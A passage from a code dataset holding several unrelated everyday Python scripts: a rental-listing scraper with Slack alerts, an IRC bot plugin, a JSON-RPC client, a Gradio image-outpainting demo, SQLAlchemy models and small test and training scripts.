\" if prop['has_garden'] else \"\")\n\n sc.api_call(\"chat.postMessage\", channel=\"#general\",\n text=text, username='propertybot',\n icon_emoji=':new:')\n create_card(\"{} - {}\".format(prop['title'], prop['price']), text)\n\n\ndef update_list(should_notify=True, area=work_addr1):\n query_string = urlencode(\n OrderedDict(term=area,\n within=str(radius),\n prices_min=min_value,\n prices_max=max_value,\n bedrooms_min=0,\n bedrooms_max=3,\n isLive=\"true\"))\n\n url = (\"http://www.openrent.co.uk/properties-to-rent/?%s\" % query_string)\n\n html_doc = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(html_doc, 'html.parser')\n\n if os.path.isfile(links_filepath()):\n with open(links_filepath()) as f:\n existing_links = json.load(f)\n else:\n existing_links = {}\n\n with open(links_filepath(), 'w') as f:\n latest_links = [x['href'][1:] for x\n in soup.find_all(\"a\", class_=\"banda pt\")]\n print(\"Received %s property links...\" % len(latest_links))\n latest_and_old = list(set(latest_links) | set(existing_links.get('openrent', [])))\n all_data = existing_links.copy()\n all_data['openrent'] = latest_and_old\n json.dump(all_data, f, indent=4)\n\n new_links = list(set(latest_links) - set(existing_links.get('openrent',[])))\n print(\"Found %s new links!...\" % len(new_links))\n\n for property_id in new_links:\n test = parse_property_page(property_id)\n if should_notify and test is not None:\n notify(property_id)\n else:\n print(\"Found a property %s but notifications are disabled.\"\n % property_id)\n\n\ndef notify_sr(property_id):\n print(\"Notifying about %s...\" % property_id)\n\n def make_link(property_id):\n return (\"https://www.spareroom.co.uk/%s\" % property_id)\n\n sc.api_call(\"api.test\")\n sc.api_call(\"channels.info\", channel=\"1234567890\")\n\n with open(property_filepath_sr(property_id)) as f:\n prop = json.load(f)\n\n should_notify_, reason = should_notify(prop)\n if not should_notify_:\n print(\"Skipping notification: %s...\" % reason)\n return\n\n if not len(prop['location']) > 0:\n prop['location'].append(['unknown'] * 2)\n text = (\"<{link}|{title}> close to {location} ({walk_duration}):\\n\"\n \"*Price:* {price:.2f}. *Available from:* {av}. *EPC:* {epc}. {has_garden}\\n\"\n \"{directions}.\\n*Description:*\\n{desc}\").format(\n location=prop['location'][0][0],\n walk_duration=prop['location'][0][1],\n link=make_link(property_id),\n price=prop['price'],\n desc=prop['description'][:1000],\n av=prop['available_from'],\n title=prop['title'],\n epc=prop['EPC'],\n directions=directions_link(prop),\n has_garden=\"With garden. 
\" if prop['has_garden'] else \"\")\n\n sc.api_call(\"chat.postMessage\", channel=\"#general\",\n text=text, username='propertybot',\n icon_emoji=':new:')\n create_card(\"{} - {:.2f}\".format(prop['title'], prop['price']), text)\n\n\ndef update_list_sr(should_notify=True, area=work_addr1, search_id=None):\n\n headers = {'User-Agent': 'SpareRoomUK 3.1'}\n cookies = {'session_id': '00000000', 'session_key': '000000000000000'}\n api_location = 'http://iphoneapp.spareroom.co.uk'\n api_search_endpoint = 'flatshares'\n api_details_endpoint = 'flatshares'\n\n def make_get_request(url=None, headers=None, cookies=None, proxies=None, sleep_time=0.3):\n # if DEBUG:\n print('Sleeping for {secs} seconds'.format(secs=sleep_time))\n sleep(sleep_time)\n return requests.get(url, cookies=cookies, headers=headers).text\n\n if search_id is None:\n params = OrderedDict(format='json',\n max_rent=max_value,\n per='pcm',\n page=1,\n max_per_page=100,\n where=area.lower(),\n miles_from_max=str(radius),\n posted_by=\"private_landlords\",\n showme_1beds='Y',\n available_from='{:%Y-%m-%d}'.format(avail_from),\n )\n\n else:\n params = OrderedDict(format='json',\n search_id=search_id,\n page=1)\n\n sr_results = list()\n page = 1\n total_pages = 100\n pages_left = 100\n while pages_left:\n url = '{location}/{endpoint}?{params}'.format(location=api_location,\n endpoint=api_search_endpoint,\n params=urlencode(params))\n try:\n results = json.loads(make_get_request(url=url,\n cookies=cookies,\n headers=headers))\n page = results['page']\n total_pages = results['pages']\n pages_left = total_pages - page\n sr_results.extend(results['results'])\n # if VERBOSE:\n # print('Parsing page {page}/{total} flats in {area}'.format(page=results['page'], total=results['pages'], area=area))\n except Exception as e:\n print(e)\n return None\n params['page'] += 1\n\n # Add results to the list\n if os.path.isfile(links_filepath()):\n with open(links_filepath()) as f:\n existing_links = json.load(f)\n else:\n existing_links = {}\n\n with open(links_filepath(), 'w') as f:\n latest_links = [r['advert_id'] for r in sr_results]\n print(\"Received %s property links...\" % len(latest_links))\n print(\" saved links {}\".format(len(set(existing_links.get('spareroom', [])))))\n latest_and_old = list(set(latest_links) | set(existing_links.get('spareroom',[])))\n all_data = existing_links.copy()\n all_data['spareroom'] = latest_and_old\n json.dump(all_data, f, indent=4)\n\n new_links = list(set(latest_links) - set(existing_links.get('spareroom', [])))\n print(\"Found %s new links!...\" % len(new_links))\n new_links = [r for r in sr_results if r['advert_id'] in new_links]\n\n # === Check each property and create notification\n for property_prop in new_links:\n property_id = property_prop['advert_id']\n test = parse_property_page_sr(property_prop)\n if should_notify and test is not None:\n notify_sr(property_id)\n else:\n print(\"Found a property %s but notifications are disabled.\"\n % property_id)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nonotify\", help=\"don't notify\", action='store_true',\n default=False)\n args = parser.parse_args()\n\n should_notify_ = not args.nonotify\n if not os.path.isfile(links_filepath()):\n should_notify_ = False\n print(\"No links.json detected. 
This must be the first run: not\"\n \" notifying about all suitable properties.\")\n for area in areas:\n update_list(should_notify=should_notify_, area=area)\n update_list_sr(should_notify=should_notify_, area=area)\n# TODO: MAX TERM IN SR\n","sub_path":"get_properties.py","file_name":"get_properties.py","file_ext":"py","file_size_in_byte":12367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511067648","text":"import pygame\npygame.init()\n\npygame.display.set_mode(size=(300, 500))\n\n # for event in pygame.event.get():\nkey = pygame.key.get_pressed()\n # print(key)\nif key[pygame.K_RIGHT]:\n print(\"to the right...\")\n print(key)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"576146116","text":"import json\nimport os\nfrom Twitter_Utils.TweetProcessing import TweetProcessor\nfrom Gnip_Client.IBMToneAnalysis import ToneAnalyzer\n\n\nclass DataTrimmer:\n def __init__(self):\n self.tweet_processor = TweetProcessor()\n self.tone_analyzer = ToneAnalyzer()\n\n @staticmethod\n def get_file_location(index):\n return os.getcwd() + '/Gnip_Client/Gnip_Searches/Gnip_Search_' + str(index) + '.json'\n\n def load_json_blob(self, counter):\n file_path = self.get_file_location(counter)\n with open(file_path) as data_file:\n return json.load(data_file)\n\n def get_tweets(self, s, r):\n tweet_set = set([])\n for i in range(s, r):\n try:\n print('At index ' + str(i))\n json_file = self.load_json_blob(i)\n for result in json_file['results']:\n tweet = self.tweet_processor.standardize_tweet(result['body'])\n emotions = self.tone_analyzer.query_ibm_for_tone(tweet)\n tweet_set.add(tweet)\n with open('output.csv', 'a+b') as analyzed_tweets:\n if emotions[0] and emotions[1] and emotions[2] and emotions[3] and emotions[4]:\n analyzed_tweets.write(tweet + ', ' + emotions[0] + ', ' + emotions[1] + ', '\n + emotions[2] + ', ' + emotions[3] + ', ' + emotions[4] + '\\n')\n except KeyError:\n # narrowed from a bare except: the message only describes a missing key\n print('Key \"body\" not found.')\n return None\n # return after the whole range has been processed, not inside the loop\n return tweet_set\n\n\nd = DataTrimmer()\nd.get_tweets(2,4)\n","sub_path":"Gnip_Client/GNIPDataTrimmer.py","file_name":"GNIPDataTrimmer.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"89122692","text":"#!/usr/bin/python3\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n email = {}\n email['email'] = sys.argv[2]\n\n r = requests.post(url, email)\n print(r.content.decode('utf-8'))\n","sub_path":"0x11-python-network_1/6-post_email.py","file_name":"6-post_email.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"627052726","text":"from pitch_utils import get_avg_pitch\nimport os\nfrom scipy import stats\nimport numpy as np\n\ninfiledir = \"data_highpitched_distr/train/woman\"\nnewdir = \"higher_pitched\"\npitches = []\nfor dirpath, dirnames, filenames in os.walk(infiledir):\n for filename in [f for f in filenames if f.endswith(\".wav\")]:\n filepath = os.path.join(dirpath, filename)\n pitches.append(get_avg_pitch(filepath))\n\n# remove values lower than 65Hz (that's about the lowest freq for male voice)\npitches = list(filter(lambda bigval: bigval >= 65, pitches))\n\ntot_avg_pitch = np.mean(pitches)\n\nprint(\"Average pitch for directory, \" + infiledir + \", is \" + 
str(tot_avg_pitch))\nprint(stats.describe(pitches))\n","sub_path":"get_dir_avg_pitch.py","file_name":"get_dir_avg_pitch.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"230472705","text":"import os\nimport gdown\nimport zipfile\nimport tensorflow\nfrom keras.models import Model, model_from_json\nfrom keras.layers import Activation, Dense, Input, \\\n Conv2DTranspose, Flatten\nfrom keras.optimizers import Adam\nimport numpy as np\nimport cv2\nimport gradio\nfrom PIL import Image # Image.fromarray is used in predict() below; this import was missing\n\ntry:\n from keras_contrib.layers.normalization import \\\n InstanceNormalization\nexcept Exception:\n from keras_contrib.layers.normalization.instancenormalization\\\n import \\\n InstanceNormalization\n\nCHECKPOINT_PATH = 'checkpoint/'\nCHECKPOINT_LINK = 'https://drive.google.com/u/0/uc?' \\\n 'export=download&confirm=a7YF&id=' \\\n '1MfXsRwjx5CTRGBoLx154S0h-Q3rIUNH0'\n\nINPUT_SHAPE = (256, 256, 3)\n# 25%, i.e. 64 pixels of width will be masked on each side\nMASK_PERCENTAGE = .25\n\ng_input_shape = (INPUT_SHAPE[0], int(INPUT_SHAPE[1] * (MASK_PERCENTAGE * 2)),\n INPUT_SHAPE[2])\n\n\nEPSILON = 1e-9\nALPHA = 0.0004\n\ndef dcrm_loss(y_true, y_pred):\n return -tensorflow.reduce_mean(tensorflow.log(tensorflow.maximum(y_true, EPSILON)) +\n tensorflow.log(tensorflow.maximum(1. - y_pred, EPSILON)))\n\nd_input_shape = (INPUT_SHAPE[0], int(INPUT_SHAPE[1] * (MASK_PERCENTAGE *2)), INPUT_SHAPE[2])\nd_dropout = 0.25\nDCRM_OPTIMIZER = Adam(0.0001, 0.5)\n\nGEN_OPTIMIZER = Adam(0.001, 0.5)\n\ndef load_model():\n # Check that all the models exist\n model_names = ['DCRM', 'GEN']\n files = os.listdir(CHECKPOINT_PATH)\n for model_name in model_names:\n if model_name + \".json\" not in files or \\\n model_name + \".hdf5\" not in files:\n print(\"Models not Found\")\n return\n # global DCRM, GEN, COMBINED, IMAGE, GENERATED_IMAGE, CONF_GENERATED_IMAGE\n\n # load DCRM Model\n model_path = CHECKPOINT_PATH + \"%s.json\" % 'DCRM'\n weight_path = CHECKPOINT_PATH + \"%s.hdf5\" % 'DCRM'\n with open(model_path, 'r') as f:\n DCRM = model_from_json(f.read())\n DCRM.load_weights(weight_path)\n DCRM.compile(loss=dcrm_loss, optimizer=DCRM_OPTIMIZER)\n\n # load GEN Model\n model_path = CHECKPOINT_PATH + \"%s.json\" % 'GEN'\n weight_path = CHECKPOINT_PATH + \"%s.hdf5\" % 'GEN'\n with open(model_path, 'r') as f:\n GEN = model_from_json(f.read(), custom_objects={\n 'InstanceNormalization': InstanceNormalization()})\n GEN.load_weights(weight_path)\n\n # Combined Model\n DCRM.trainable = False\n IMAGE = Input(shape=g_input_shape)\n GENERATED_IMAGE = GEN(IMAGE)\n CONF_GENERATED_IMAGE = DCRM(GENERATED_IMAGE)\n\n COMBINED = Model(IMAGE, [CONF_GENERATED_IMAGE, GENERATED_IMAGE])\n COMBINED.compile(loss=['mse', 'mse'], optimizer=GEN_OPTIMIZER)\n\n print(\"loaded model\")\n return GEN\n\n\ndef get_demask_images(original_images, generated_images):\n demask_images = []\n for o_image, g_image in zip(original_images, generated_images):\n print(g_image.shape)\n width = g_image.shape[1] // 2\n x_image = g_image[:, :width]\n y_image = g_image[:, width:]\n o_image = np.concatenate((x_image,o_image, y_image), axis=1)\n demask_images.append(o_image)\n return np.asarray(demask_images)\n\ndef mask_width(img):\n image = img.copy()\n height = image.shape[0]\n width = image.shape[1]\n new_width = int(width * MASK_PERCENTAGE)\n mask = np.ones([height, new_width, 3])\n missing_x = img[:, :new_width]\n missing_y = img[:, width - new_width:]\n missing_part = np.concatenate((missing_x, missing_y), 
axis=1)\n image = image[:, :width - new_width]\n image = image[:, new_width:]\n return image, missing_part\n\n\ndef get_masked_images(images):\n mask_images = []\n missing_images = []\n for image in images:\n mask_image, missing_image = mask_width(image)\n mask_images.append(mask_image)\n missing_images.append(missing_image)\n return np.array(mask_images), np.array(missing_images)\n\n\ndef recursive_paint(GEN, image, factor=3):\n final_image = None\n gen_missing = None\n for i in range(factor):\n demask_image = None\n if i == 0:\n x, y = get_masked_images([image])\n gen_missing = GEN.predict(x)\n final_image = get_demask_images(x, gen_missing)[0]\n else:\n gen_missing = GEN.predict(gen_missing)\n final_image = get_demask_images([final_image], gen_missing)[0]\n return final_image\n\n\ndef load():\n if not os.path.exists(CHECKPOINT_PATH):\n os.makedirs(CHECKPOINT_PATH)\n gdown.download(CHECKPOINT_LINK, CHECKPOINT_PATH + 'checkpoint_24.zip')\n with zipfile.ZipFile(CHECKPOINT_PATH + 'checkpoint_24.zip', 'r') as \\\n zip_ref:\n zip_ref.extractall('./')\n GEN = load_model()\n graph = tensorflow.get_default_graph()\n return GEN, graph\n\nGEN, graph = load()\n\ndef predict(image, model):\n image = Image.fromarray(image.astype('uint8'), 'RGB')\n GEN, graph = model\n image = image.convert('RGB')\n image = np.array(image)\n image = cv2.resize(image, (256, 256))\n cropped_image = image[:, 65:193]\n input_image = image / 127.5 - 1\n # input_image = np.expand_dims(input_image, axis=0)\n with graph.as_default():\n # predicted_image = GEN.predict(input_image)\n predicted_image = recursive_paint(GEN, input_image)\n # predicted_image = get_demask_images(input_image, predicted_image)[0]\n predicted_image = (predicted_image + 1) * 127.5\n predicted_image = predicted_image.astype(np.uint8)\n\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # predicted_image = cv2.cvtColor(predicted_image, cv2.COLOR_BGR2RGB)\n return predicted_image\n\n\nINPUTS = gradio.inputs.ImageIn()\nOUTPUTS = gradio.outputs.Image()\nINTERFACE = gradio.Interface(fn=predict, inputs=INPUTS, \n outputs=OUTPUTS,\n title='Image Outpainting', \n description='Restore missing parts of an image!', \n thumbnail='https://camo.githubusercontent.com/1374c4a783e9a1b3f31cda08e84fd1c39ebb618d/687474703a2f2f692e696d6775722e636f6d2f704455707a63592e6a7067')\n\nINTERFACE.launch(inbrowser=True)\n\n","sub_path":"run-gradio.py","file_name":"run-gradio.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285746667","text":"#!/usr/bin/python3\n# Python 3 json rpc client module, with cookie support\n\nimport os.path\nimport urllib.request\nfrom http.cookiejar import LWPCookieJar\nimport json, types\n\n# this cookie jar will work with lib-www too\ncookiejar = LWPCookieJar( '/tmp/session_cookie.lwp' )\n\ncookie = urllib.request.HTTPCookieProcessor( cookiejar )\nopener = urllib.request.build_opener(cookie)\nurllib.request.install_opener(opener)\n\ntype_map = {\n 'string': str,\n 'number': float,\n 'boolean' : bool,\n 'object': dict,\n 'array': list\n}\n\nclass JsonRPC:\n def __init__( self, url ):\n if os.path.isfile( cookiejar.filename ):\n cookiejar.load()\n\n self._method = {}\n self._seq_id = 0\n self._base_url = url\n\n self._load_services()\n self._cookiejar = cookiejar\n\n def __del__( self ):\n self._cookiejar.save()\n\n def _load_services( self ):\n r = urllib.request.urlopen( self._base_url + '/service.smd' ).read().decode( 'utf8' )\n\n d = json.loads( r )\n\n 
for name in d[ 'services' ]:\n self._method[ name ] = d[ 'services' ][ name ]\n\n def __getattr__( self, method_name ):\n mdata = self._method[ method_name ]\n\n def jsonrpc_call( *args ):\n idx = 0\n self._seq_id += 1\n seq_id = self._seq_id\n\n # We need argument checking here !\n params = []\n for a in args:\n if 'parameters' in mdata:\n p = mdata['parameters'][ idx ]\n\n if p[ 'type' ] in type_map:\n if type_map[ p[ 'type' ] ] != type( a ):\n raise Exception( \"bad param type: %s = %s for method %s \" % (p['type'], type( a ), method_name))\n else:\n raise Exception( 'unknown definition type \\'%s\\' as it should have been a \\'%s\\' in method : %s ' % (type( a ), p[ 'type' ], method_name) )\n\n idx += 1\n params.append( a )\n\n payload = {\n 'method' : method_name,\n 'params' : params,\n 'jsonrpc': \"2.0\",\n 'id' : seq_id\n }\n\n req = urllib.request.Request( self._base_url, data=json.dumps( payload ).encode())\n req.add_header('Content-Type', 'application/json')\n r = json.loads( urllib.request.urlopen(req).read().decode( 'utf8' ))\n\n if r[ 'id' ] == seq_id:\n if 'result' in r:\n return r[ 'result' ]\n elif 'error' in r:\n raise Exception( 'Error \"%s\" in method %s' % (r[ 'error' ][ 'message' ], method_name) )\n else:\n raise Exception( 'Unknown error in method %s' % method_name )\n\n raise Exception( 'bad RPC response for method %s' % method_name )\n\n return jsonrpc_call\n\nif __name__ == '__main__':\n r = JsonRPC( 'http://localhost:8080/json' )\n r.domain_open( 'essens' )\n print( r.status('kat') )\n","sub_path":"py_print/json_client.py","file_name":"json_client.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"170520447","text":"import itertools\nimport random\nfrom urllib.parse import urlencode\n\nimport requests\nfrom irc3.plugins.command import command\nimport irc3\nimport ircmessage\nfrom lxml import html\nimport re\n\nfrom .redflare_client import RedflareClient\n\n\n@irc3.plugin\nclass RELBotPlugin:\n def __init__(self, bot):\n self.bot = bot\n self.redflare_url = self.bot.config.get(\"relbot\", dict()).get(\"redflare_url\", None)\n\n @command(permission=\"view\")\n def matches(self, mask, target, args):\n \"\"\"List interesting Red Eclipse matches\n\n %%matches\n \"\"\"\n\n if not self.redflare_url:\n yield \"Redflare URL not configured\"\n return\n\n rfc = RedflareClient(self.redflare_url)\n servers = rfc.servers()\n\n # i: Server\n non_empty_legacy_servers = [s for s in servers if s.players_count > 0 and not s.version.startswith(\"2.\")]\n\n if not non_empty_legacy_servers:\n yield \"No legacy matches running at the moment.\"\n return\n\n for server in sorted(non_empty_legacy_servers, key=lambda s: s.players_count, reverse=True):\n players = [p.name for p in server.players]\n\n # the colors we use to format player names\n colors = [\"red\", \"pink\", \"green\", \"teal\", \"orange\", None]\n # make things a bit more interesting by randomizing the order\n random.shuffle(colors)\n # however, once the order is defined, just apply those colors in the ever same order to nicks in the list\n # it'd be nice to assign some sort of \"persistent\" colors derived from the nicks\n colors = itertools.cycle(colors)\n\n # this is the \"freem exception\"\n # freem doesn't like to be pinged on IRC whenever !matches is called while they are playing\n # the easiest way to fix this is to just change the name in the listing\n # ofc this only works until freem 
decides to use another nickname\n players = [\"_freem_\" if p == \"freem\" else p for p in players]\n\n message = \"%s on %s (%s): %s %s on %s\" % (\n ircmessage.style(str(server.players_count), fg=\"red\"),\n ircmessage.style(\"%s\" % server.description, fg=\"orange\"),\n \", \".join((ircmessage.style(p, fg=next(colors)) for p in players)),\n ircmessage.style(\"-\".join(server.mutators), fg=\"teal\"),\n ircmessage.style(server.game_mode, fg=\"green\"),\n ircmessage.style(server.map_name, fg=\"pink\"),\n )\n\n print(repr(message))\n\n yield message\n\n @command(permission=\"view\")\n def rivalry(self, mask, target, args):\n \"\"\"Show player counts on legacy and 2.x servers\n\n %%rivalry\n \"\"\"\n\n if not self.redflare_url:\n yield \"Redflare URL not configured\"\n return\n\n rfc = RedflareClient(self.redflare_url)\n servers = rfc.servers()\n\n # i: Server\n non_legacy_servers = [s for s in servers if s.version.startswith(\"2.\")]\n legacy_servers = [s for s in servers if not s in non_legacy_servers]\n\n non_legacy_players_count = sum([s.players_count for s in non_legacy_servers])\n legacy_players_count = sum([s.players_count for s in legacy_servers])\n\n message = \"%d legacy vs. %d non-legacy players\" % (legacy_players_count, non_legacy_players_count)\n\n if non_legacy_players_count == 0:\n if legacy_players_count == 0:\n ratio = None\n else:\n # with no matches running, legacy wins\n # over 9000!\n ratio = 9001\n else:\n ratio = float(legacy_players_count) / float(non_legacy_players_count)\n\n if ratio is None:\n message += \" -- no matches running o_O\"\n elif ratio > 2:\n message += \" -- WOOHOO!!!111!1!!11\"\n elif ratio > 1:\n message += \" -- awesome!\"\n elif ratio == 1:\n message += \"... meh...\"\n else:\n message += \"... urgh...\"\n\n yield message\n\n @command(name=\"reload-plugin\", permission=\"view\")\n def reload_plugin(self, mask, target, args):\n \"\"\"Reloads this plugin\n\n %%reload-plugin\n \"\"\"\n\n self.bot.reload(\"relbot.chat_plugin\")\n\n yield \"Done!\"\n\n @command(name=\"rp\", permission=\"view\")\n def rp(self, *args, **kwargs):\n \"\"\"Reloads this plugin\n\n %%rp\n \"\"\"\n return self.reload_plugin(*args, **kwargs)\n\n @command(name=\"lmgtfy\", permission=\"view\")\n def lmgtfy(self, mask, target, args):\n \"\"\"Let me google that for you!\n\n %%lmgtfy ...\n \"\"\"\n\n querystring = urlencode({\n \"q\": \" \".join(args[\"\"]),\n })\n\n yield \"https://lmgtfy.com/?{}\".format(querystring)\n\n @command(name=\"chuck\", permission=\"view\")\n def chuck(self, mask, target, args):\n \"\"\"Tell a Chuck Norris joke from the Internet Chuck Norris Database (icndb.com)\n\n %%chuck\n \"\"\"\n\n proxies = {\n \"http\": \"socks5://127.0.0.1:9050\",\n \"https\": \"socks5://127.0.0.1:9050\",\n }\n\n url = \"http://api.icndb.com/jokes/random\"\n\n response = requests.get(url, allow_redirects=True, proxies=proxies)\n\n yield response.json()[\"value\"][\"joke\"]\n\n @irc3.event(irc3.rfc.PRIVMSG)\n def github_integration(self, mask, target, data, **kwargs):\n \"\"\"Check every message if it contains GitHub references (i.e., some #xyz number), and provide a link to GitHub\n if possible.\n Uses web scraping instead of any annoying\n Note: cannot use yield to send replies; it'll fail silently then\n \"\"\"\n\n # skip all commands\n if any((data.strip(\" \\r\\n\").startswith(i) for i in [self.bot.config[\"cmd\"], self.bot.config[\"re_cmd\"]])):\n return\n\n # some things can't be done easily by a regex\n # we have to intentionally terminate the data with a space\n # that 
way, we can check that the #123 like patters stand alone using a regex that makes sure there's at least\n # a whitespace character after the interesting bit, ensuring that strings like #123abc are not matched\n # this should prevent some false and unnecessary checks\n data += \" \"\n\n matches = re.findall(r\"#([0-9]+)\\s+\", data)\n\n print(matches)\n\n for match in matches:\n # we just check the issues URL; GitHub should automatically redirect to pull requests\n url = \"https://github.com/blue-nebula/base/issues/{}\".format(match)\n\n proxies = {\n \"http\": \"socks5://127.0.0.1:9050\",\n \"https\": \"socks5://127.0.0.1:9050\",\n }\n\n response = requests.get(url, allow_redirects=True, proxies=proxies)\n\n if response.status_code != 200:\n if response.status_code == 404:\n self.bot.notice(target, \"[GitHub] Could not find anything for #{}\".format(match))\n\n else:\n self.bot.notice(target, \"[GitHub] Request to GitHub failed\")\n\n return\n\n tree = html.fromstring(response.content)\n title = tree.cssselect(\".gh-header-title .js-issue-title\")[0].text.strip(\" \\r\\n\")\n\n url_parts = response.url.split(\"/\")\n if \"pull\" in url_parts:\n type = \"PR\"\n elif \"issues\" in url_parts:\n type = \"Issue\"\n else:\n type = \"Unknown Entity\"\n\n notice = \"[GitHub] {} #{}: {} ({})\".format(type, match, title, response.url)\n\n self.bot.notice(target, notice)\n\n @classmethod\n def reload(cls, old):\n return cls(old.bot)\n","sub_path":"relbot/chat_plugin.py","file_name":"chat_plugin.py","file_ext":"py","file_size_in_byte":7760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"310180227","text":"import os, sys\nfrom pandac.PandaModules import ConfigVariableBool\nfrom pandac.PandaModules import ConfigVariableInt\n\nfrom direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\n\nif 0:\n wp = WindowProperties()\n #wp.setFullscreen(1)\n #wp.setSize(1024, 768)\n\nif 0:\n\n base.openMainWindow()\n base.win.requestProperties(wp)\n base.graphicsEngine.openWindows()\n \nif 1:\n class MyApp(ShowBase):\n def __init__(self):\n ShowBase.__init__(self)\n self.accept(\"escape\",sys.exit)\n self.setBackgroundColor(0,0,0)\n\n if 0:\n wp = WindowProperties()\n wp.setFullscreen(1)\n wp.setSize(1920, 1080)\n \n self.openMainWindow()\n self.win.requestProperties(wp)\n self.graphicsEngine.openWindows()\n\n self.wp1 = WindowProperties()\n self.wp1.setSize(800, 600)\n self.wp1.setOrigin(100, 100)\n self.win1 = base.openWindow(props=self.wp1, aspectRatio=1)\n \n self.wp2 = WindowProperties()\n self.wp2.setSize(800, 600)\n self.wp2.setOrigin(900, 100)\n self.win2 = base.openWindow(props=self.wp2, aspectRatio=1)\n\n self.disableMouse()\n\n if 0:\n text = TextNode('node name')\n text.setText(\"Every day in every way I'm getting better and better.\")\n textNodePath = aspect2d.attachNewNode(text)\n cmr12 = loader.loadFont('cmr12.egg')\n text.setAlign(TextNode.ACenter)\n\n text.setFont(cmr12)\n textNodePath.setScale(0.1)\n\n app = MyApp()\n app.run()\n\n","sub_path":"pandastest/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"177372488","text":"# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import String, Integer, DateTime\nfrom sqlalchemy.orm import declarative_base\n\nBase = declarative_base()\n\n\nclass Wallet(Base):\n __tablename__ = \"wallet\"\n\n idx = Column(\n Integer,\n unique=True,\n 
primary_key=True,\n nullable=False\n )\n\n owner = Column(\n String(50),\n nullable=False\n )\n\n name = Column(\n String(30),\n nullable=False\n )\n\n count = Column(\n Integer,\n nullable=False,\n default=0\n )\n\n def __repr__(self):\n return f\"\"\n\n\nclass Coin(Base):\n __tablename__ = \"coin\"\n\n name = Column(\n String(30),\n unique=True,\n primary_key=True,\n nullable=False\n )\n\n price = Column(\n Integer,\n nullable=False\n )\n\n def __repr__(self):\n return f\"\"\n\n\nclass Point(Base):\n __tablename__ = \"point\"\n\n owner = Column(\n String(50),\n unique=True,\n primary_key=True,\n nullable=False\n )\n\n point = Column(\n Integer,\n nullable=False\n )\n\n def __repr__(self):\n return f\"\"\n\n\nclass Gift(Base):\n __tablename__ = \"gift\"\n\n idx = Column(\n Integer,\n unique=True,\n primary_key=True,\n nullable=False\n )\n\n owner = Column(\n String(50),\n nullable=False\n )\n\n type = Column(\n String(30),\n nullable=False\n )\n\n date = Column(\n DateTime,\n nullable=False\n )\n\n def __repr__(self):\n return f\"\"\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566478759","text":"# Using Cosine Distance to train a matching network\n\nimport tensorflow as tf\nimport numpy as np\nimport getopt\nimport random\nimport math\nimport sys\nimport os\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"../../../testing-data/MNIST_data/\",\n one_hot=True)\n\ndef help_message():\n exit(1)\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\n\n# Graph Constants\nsize = [28, 28, 1]\nnKernels = [64, 64,64]\nfully_connected_nodes = 128\npoolS = 2\n\n# Training information\nnIt = 5000\ncheck = 1000\nbatchS = 32\nlearning_rate = 1e-4\ntensorboard = False\ndropout = False\nbatch_norm = False\n\n# Support and testing infromation\nclassList = [1,2,3,4,5,6,7,8,9,0]\nnumbers = []\nnumbersTest = []\nnClasses = 3\nnImgsSuppClass = 5\n\nbase = \"/tmp/mnist-cosine-\"\n\nopts, args = getopt.getopt(sys.argv[1:], \"hmnodL:c:i:b:s:\", [\"help\", \n \"num_classes=\", \"num_supports=\", \"base_path=\", \"num_iterations=\",\n \"dropout\", \"batch_norm\", \"num_layers=\"])\n\nfor o, a in opts:\n if o in (\"-c\", \"--num_classes\"):\n nClasses = int(a)\n elif o in (\"-s\", \"--num_supports\"):\n nImgsSuppClass = int(a)\n elif o in (\"-b\", \"--base_path\"):\n base = a\n if a[-1] != \"/\":\n base += \"/\"\n base += \"mnist-cosine-\"\n elif o in (\"-i\", \"--num_iterations\"):\n nIt = int(a)\n elif o in (\"-d\", \"--data\"):\n train_file_path = \"../../../testing-data/omniglot-rotate/\"\n elif o in (\"-m\", \"--meta_tensorboard\"):\n tensorboard = True\n elif o in (\"-o\", \"--dropout\"):\n dropout = True\n elif o in (\"-n\", \"--batch_norm\"):\n batch_norm = True\n elif o in (\"-L\", \"--num_layers\"):\n nKernels = [64 for x in range(int(a))]\n elif o in (\"-h\", \"--help\"):\n help_message()\n else:\n print(\"unhandled option: \"+o)\n help_message()\n\nnumbers = classList[:nClasses]\nnumbersTest = classList[10-nClasses:]\n\nSAVE_PATH = base\nif batch_norm:\n SAVE_PATH += \"norm-\"\nif dropout:\n SAVE_PATH += \"dropout-\"\n\nSAVE_PATH += str(len(nKernels)) + \"-\" + str(nClasses) + \"-\" + str(nImgsSuppClass)\n\nLOG_DIR = \"./mnist_network_training/cosine/\"\nif batch_norm:\n LOG_DIR += \"norm/\"\nif dropout:\n LOG_DIR += \"dropout/\"\nLOG_DIR += str(len(nKernels)) + 
